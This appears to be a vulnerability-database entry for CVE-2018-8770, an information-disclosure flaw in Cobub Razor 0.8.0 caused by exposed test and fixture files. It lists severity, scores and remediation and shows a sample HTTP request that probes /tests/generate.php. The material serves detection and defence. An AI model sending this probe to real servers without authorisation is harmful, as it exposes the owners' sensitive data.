🔙 목록으로 돌아가기

CVE-2018-8770: Cobub Razor 0.8.0 - Information Disclosure

TitleCobub Razor 0.8.0 - Information Disclosure
Authorprincechaddha
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain sensitive information.
RemediationUpgrade to a patched version of Cobub Razor.
CVSS Score5.3
EPSS Score0.58047
CVE IDCVE-2018-8770
CWE IDCWE-200
Tags cve cve2018 cobub razor exposure edb vuln

🔍 Vulnerability Description

Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /tests/generate.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-8770.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-8770.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A